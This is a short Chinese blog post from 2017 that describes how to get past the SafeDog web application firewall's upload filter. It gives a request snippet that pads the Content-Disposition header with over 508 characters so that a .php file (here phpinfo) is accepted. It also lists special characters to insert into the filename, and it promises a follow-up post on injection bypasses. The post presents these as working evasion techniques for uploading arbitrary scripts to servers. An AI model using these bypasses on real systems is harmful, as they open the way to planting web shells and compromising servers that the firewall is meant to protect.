安全狗文件上传绕过

作者: Luan 分类: 学习笔记 发布时间: 2017-04-16 23:41

测试时间:   20170416

测试环境:   Win2003

Apache 2.2.3 / IIS 6.0

Php5.3.5

安全狗防护规则版本 2017-03-14

 

方法1:

上传文件的Content-Disposition扩展头字段在filename前插入任意字符长度>=508即可绕过安全狗上传任意后缀文件

 

Content-Disposition:form-data;name="file";_www.cnzxsoft.com_www.cnzxsoft.com_www.cnzxsoft.com_www.cnzxsoft.com_www.cnzxsoft.com_www.cnzxsoft.com_www.cnzxsoft.com_www.cnzxsoft.com_www.cnzxsoft.com_www.cnzxsoft.com_www.cnzxsoft.com_www.cnzxsoft.com_www.cnzxsoft.com_www.cnzxsoft.com_www.cnzxsoft.com_www.cnzxsoft.com_www.cnzxsoft.com_www.cnzxsoft.com_www.cnzxsoft.com_www.cnzxsoft.com_www.cnzxsoft.com_www.cnzxsoft.com_www.cnzxsoft.com_www.cnzxsoft.com_www.cnzxsoft.com_www.cnzxsoft.com_www.cnzxsoft.com_......;filename="cnzxsoft.php"
Content-Type: image/png

<?php phpinfo();?>

方法2:

文件名中插入特殊符号:

分号 空格 单引号 换行符

方法3:

Content-Disposition扩展头字段中的filename=后插入特殊符号:

空格 换行符

 

 

 

绕过安全狗注入的方法整理一下再发。

如果觉得我的文章对您有用,请随意打赏。您的支持将鼓励我继续创作!

2条评论

发表评论